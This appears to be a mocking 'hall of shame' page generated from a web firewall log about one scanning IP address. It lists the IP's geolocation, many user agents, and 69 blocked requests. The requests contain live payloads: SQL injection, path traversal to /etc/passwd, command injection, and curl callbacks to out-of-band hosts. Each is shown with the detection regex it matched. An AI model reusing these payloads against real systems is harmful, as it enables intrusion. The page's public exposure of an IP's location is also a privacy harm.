Congratulations,
Dumbass

> cat /var/log/your-failures.log_

A very special round of applause for 109.123.249.184 for their valiant — and entirely unsuccessful — attempt to compromise our systems. We truly couldn't have done it without you. Well, actually we could. We did. You failed.

We Might Not Know Where You Live, But...

Did you think you were anonymous? That's adorable. Here's what we know about you:

IP Address 109.123.249.184
Country France
Region Grand Est
City Lauterbourg
ISP / Org Unknown
Timezone Unknown
Coordinates 48.9742, 8.1851

Your Digital Fingerprint

Nice browser you've got there. It'd be a shame if someone… logged it.

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/13 Safari/608.2.11
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.9
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.2
Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/7.0
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15
Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.16
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.7
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Mozilla/5.0 X11; Ubuntu; Linux x86_64; rv:126.0 Gecko/20100101 Firefox/126.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.4 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:139.0) Gecko/20100101 Firefox/139.0
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.14
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15
Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:90.0) Gecko/20100101 Firefox/90.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.20
Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 11_7_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36

Your Hall of Shame

Every single one of your pathetic attempts, lovingly preserved for posterity. Spoiler alert: they all failed.

Attack Breakdown

15
LDAP Injection
64
General Fuzzing / Forced Browsing
7
Server-Side Request Forgery
11
Path Traversal
5
Cross-Site Scripting (XSS)
5
Command Injection
24
SQL Injection
3
Template Injection
4
Local/Remote File Inclusion
138
Total Failed Attempts

Detailed Activity Log

# Timestamp Attack Type Method Target URI Detail
1 2026-02-11T08:26:21Z LDAP Injection POST /index.php ldap_injection [POST][config] matched /[)(|*\\]\s*[)(|*\\]/i
2 2026-02-11T09:51:17Z General Fuzzing / Forced Browsing GET /setup/setupadministrator-start.action Forced browsing attempt: /setup/setupadministrator-start.action
3 2026-02-11T09:51:23Z General Fuzzing / Forced Browsing GET /setup/setupadministrator-start.action Forced browsing attempt: /setup/setupadministrator-start.action
4 2026-02-11T09:51:26Z General Fuzzing / Forced Browsing POST /setup/setupadministrator.action Forced browsing attempt: /setup/setupadministrator.action
5 2026-02-11T10:14:28Z Server-Side Request Forgery POST /models?url=http%3a//d62h6tccr839mofp1i9gdmdrctfebpqeg.oast.fun ssrf [URI][REQUEST_URI] matched /(?:^|[=&?])url\s*=\s*(?:https?|ftp|gopher|dict|file):\/\//i
6 2026-02-11T10:42:52Z Path Traversal POST /cgi-bin/vitogate.cgi path_traversal [BODY][__raw__] matched /(?:\/|\\)etc(?:\/|\\)(?:passwd|shadow|group|hosts|crontab)/i
7 2026-02-11T10:56:09Z Cross-Site Scripting (XSS) POST /jeecg-boot/jmreport/queryFieldBySql xss [BODY][__raw__] matched /\$\{.*\}/s
8 2026-02-11T11:21:26Z Server-Side Request Forgery POST /modules/Rubrics/rubrics_visualise_saveAjax.php ssrf [HEADER][HTTP_USER_AGENT] matched /(?:127\.0\.0\.[01]|0\.0\.0\.0|localhost|::1|\[::1\])/i
9 2026-02-11T12:08:23Z Cross-Site Scripting (XSS) POST /api/users xss [BODY][__raw__] matched /<\s*(?:img|svg|body|iframe|object|embed|link|style|base|meta|form|input|button|details|marquee|video|audio|source|math|table)\b[^>]*>/i
10 2026-02-11T13:20:25Z Command Injection GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("ipconfig"); command_injection [GET][gridValoresPopHidden] matched /\b(?:system|exec|popen|passthru|shell_exec|proc_open)\s*\(/i
11 2026-02-11T14:05:48Z SQL Injection POST /cms/content/list.do sqli [POST][sqlWhere] matched /\b(?:CONCAT|CHAR|UNHEX|HEX|ASCII|ORD|CONV|CAST|CONVERT)\s*\(/i
12 2026-02-11T14:18:43Z SQL Injection GET /tutor/filter?searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 sqli [GET][price_min] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
13 2026-02-11T14:20:03Z General Fuzzing / Forced Browsing GET /wp-login.php Forced browsing attempt: /wp-login
14 2026-02-11T14:44:12Z Command Injection GET /cgi-bin/cstecgi.cgi command_injection [BODY][__raw__] matched /;\s*(?:ls|cat|id|whoami|uname|pwd|wget|curl|nc|ncat|bash|sh|zsh|csh|ksh|dash|python|perl|ruby|php|node)\b/i
15 2026-02-11T15:00:06Z SQL Injection POST /modules/ndk_steppingpack/search-result.php sqli [POST][search_query] matched /;\s*(?:DROP|ALTER|CREATE|TRUNCATE|INSERT|UPDATE|DELETE|EXEC|EXECUTE)\b/i
16 2026-02-11T15:00:10Z SQL Injection POST /modules/ndk_steppingpack/search-result.php sqli [POST][search_query] matched /\bUNION\b[\s\/\*]+\bALL\b[\s\/\*]+\bSELECT\b/i
17 2026-02-11T15:48:09Z LDAP Injection POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y ldap_injection [POST][groovyProgram] matched /[)(|*\\]\s*[)(|*\\]/i
18 2026-02-11T16:05:17Z General Fuzzing / Forced Browsing POST /cgi-bin/vitogate.cgi Forced browsing attempt: /cgi-bin/vitogate.cgi
19 2026-02-11T16:05:18Z General Fuzzing / Forced Browsing POST /cgi-bin/vitogate.cgi Forced browsing attempt: /cgi-bin/vitogate.cgi
20 2026-02-11T16:33:59Z General Fuzzing / Forced Browsing GET / BANNED (repeat offender)
21 2026-02-11T16:40:21Z General Fuzzing / Forced Browsing GET /file-manager/ BANNED (repeat offender)
22 2026-02-11T16:40:24Z General Fuzzing / Forced Browsing POST /file-manager/backend/makefile BANNED (repeat offender)
23 2026-02-11T16:40:27Z General Fuzzing / Forced Browsing POST /file-manager/backend/text BANNED (repeat offender)
24 2026-02-11T16:40:30Z General Fuzzing / Forced Browsing POST /file-manager/backend/permissions BANNED (repeat offender)
25 2026-02-11T16:40:33Z General Fuzzing / Forced Browsing GET /YTEd47tJRg.php BANNED (repeat offender)
26 2026-02-11T16:56:07Z General Fuzzing / Forced Browsing POST /api/authentication/login BANNED (repeat offender)
27 2026-02-11T16:57:15Z General Fuzzing / Forced Browsing GET /?rest_route=/ BANNED (repeat offender)
28 2026-02-11T16:57:15Z General Fuzzing / Forced Browsing GET /wp-json BANNED (repeat offender)
29 2026-02-11T18:57:26Z Path Traversal POST /wp-admin/admin-ajax.php path_traversal [POST][render_action_template] matched /(?:\.\.\/){2,}/i
30 2026-02-11T19:13:23Z Command Injection POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true command_injection [POST][argumentCollection] matched />\s*\/(?:tmp|dev|etc)\//i
31 2026-02-11T20:14:08Z Template Injection POST /nagiosxi/login.php template_injection [POST][nsp] matched /\{\{.*\}\}/s
32 2026-02-11T20:14:11Z SQL Injection GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) sqli [GET][id] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
33 2026-02-11T21:09:29Z Path Traversal GET /index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"} path_traversal [GET][attributes] matched /(?:\/|\\)etc(?:\/|\\)(?:passwd|shadow|group|hosts|crontab)/i
34 2026-02-11T21:25:00Z SQL Injection GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- sqli [GET][id] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
35 2026-02-11T21:38:52Z Path Traversal POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js path_traversal [GET][source] matched /(?:\.\.\/){2,}/i
36 2026-02-11T21:50:53Z General Fuzzing / Forced Browsing GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 Forced browsing attempt: /cgi-bin/account_mgr.cgi
37 2026-02-11T21:50:53Z Command Injection GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 command_injection [GET][name] matched /;\s*(?:ls|cat|id|whoami|uname|pwd|wget|curl|nc|ncat|bash|sh|zsh|csh|ksh|dash|python|perl|ruby|php|node)\b/i
38 2026-02-11T21:59:33Z Path Traversal POST /userentry?accountId=/../../../tomcat/webapps/TDR45/&symbolName=test&base64UserName=YWRtaW4= path_traversal [GET][accountId] matched /(?:\.\.\/){2,}/i
39 2026-02-11T21:59:39Z Command Injection GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;id;%27 command_injection [GET][group] matched /;\s*(?:ls|cat|id|whoami|uname|pwd|wget|curl|nc|ncat|bash|sh|zsh|csh|ksh|dash|python|perl|ruby|php|node)\b/i
40 2026-02-11T21:59:39Z General Fuzzing / Forced Browsing GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ifconfig;%27 Forced browsing attempt: /cgi-bin/account_mgr.cgi
41 2026-02-11T21:59:45Z General Fuzzing / Forced Browsing GET /TDR45/CVE-2023-47246.txt?true BANNED (repeat offender)
42 2026-02-11T22:50:08Z General Fuzzing / Forced Browsing GET /wp-login.php BANNED (repeat offender)
43 2026-02-11T23:02:55Z Server-Side Request Forgery GET /filex/read-raw?url=http://oast.me&cut=1 ssrf [URI][REQUEST_URI] matched /(?:^|[=&?])url\s*=\s*(?:https?|ftp|gopher|dict|file):\/\//i
44 2026-02-11T23:05:12Z Path Traversal POST /Tool/uploadfile.php path_traversal [POST][txt_path] matched /(?:\/|\\)(?:boot|root|home)(?:\/|\\)/i
45 2026-02-11T23:05:15Z Path Traversal GET /home/uyyyn.php path_traversal [URI][REQUEST_URI] matched /(?:\/|\\)(?:boot|root|home)(?:\/|\\)/i
46 2026-02-11T23:23:04Z LDAP Injection POST /WSVulnerabilityCore/VulCore.asmx ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
47 2026-02-11T23:32:10Z LDAP Injection POST /WSVulnerabilityCore/VulCore.asmx ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
48 2026-02-12T00:12:22Z General Fuzzing / Forced Browsing POST /wp-admin/admin-ajax.php Forced browsing attempt: /wp-admin/admin-ajax
49 2026-02-12T00:16:48Z LDAP Injection POST /WSVulnerabilityCore/VulCore.asmx ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
50 2026-02-12T00:22:03Z LDAP Injection POST /erp/dwr/call/plaincall/SingleRowQueryConvertor.queryForString.dwr ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
51 2026-02-12T00:49:51Z SQL Injection POST /wp-json/notificationx/v1/analytics sqli [BODY][__raw__] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
52 2026-02-12T00:54:19Z SQL Injection GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 sqli [GET][user] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
53 2026-02-12T01:07:33Z General Fuzzing / Forced Browsing GET / BANNED (repeat offender)
54 2026-02-12T01:07:36Z General Fuzzing / Forced Browsing POST /wp-json/hc/v1/themehunk-import BANNED (repeat offender)
55 2026-02-12T01:21:57Z General Fuzzing / Forced Browsing POST /api/jobs/ BANNED (repeat offender)
56 2026-02-12T01:22:08Z General Fuzzing / Forced Browsing GET / BANNED (repeat offender)
57 2026-02-12T01:22:13Z General Fuzzing / Forced Browsing GET /api/jobs/Job_D9wZrn/logs BANNED (repeat offender)
58 2026-02-12T01:28:05Z General Fuzzing / Forced Browsing GET /backend/settings/oauth_adfs?hostname=polar BANNED (repeat offender)
59 2026-02-12T01:37:11Z General Fuzzing / Forced Browsing POST /ajax-api/2.0/mlflow/registered-models/create BANNED (repeat offender)
60 2026-02-12T01:37:14Z General Fuzzing / Forced Browsing POST /ajax-api/2.0/mlflow/model-versions/create BANNED (repeat offender)
61 2026-02-12T01:37:17Z General Fuzzing / Forced Browsing POST /ajax-api/2.0/mlflow/model-versions/create BANNED (repeat offender)
62 2026-02-12T01:37:20Z General Fuzzing / Forced Browsing GET /model-versions/get-artifact?path=random&name=PzflQU&version=2 BANNED (repeat offender)
63 2026-02-12T01:38:20Z General Fuzzing / Forced Browsing GET /cslu/v1/scheduler/jobs BANNED (repeat offender)
64 2026-02-12T02:20:45Z Cross-Site Scripting (XSS) GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd xss [GET][session] matched /\$\{.*\}/s
65 2026-02-12T02:20:48Z Cross-Site Scripting (XSS) GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}d62h6tccr839mofp1i9gznmsrdmi8enc8.oast.fun xss [GET][session] matched /\$\{.*\}/s
66 2026-02-12T02:22:10Z Path Traversal GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d62h6tccr839mofp1i9gzu1abe1f5yoea.oast.fun path_traversal [URI][REQUEST_URI] matched /(?:\.\.\/){2,}/i
67 2026-02-12T02:47:56Z SQL Injection GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,cdadd3fdd882a80a16fddaa3e42baffd,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 sqli [GET][order.0.dir] matched /\bUNION\b[\s\/\*]+\bSELECT\b/i
68 2026-02-12T03:39:23Z SQL Injection POST /wp-content/plugins/wp-automatic/inc/csv.php sqli [POST][q] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
69 2026-02-12T04:09:47Z SQL Injection POST /wp-admin/admin-post.php sqli [POST][advanced_filter.conditions.0.0.field] matched /--\s*$/m
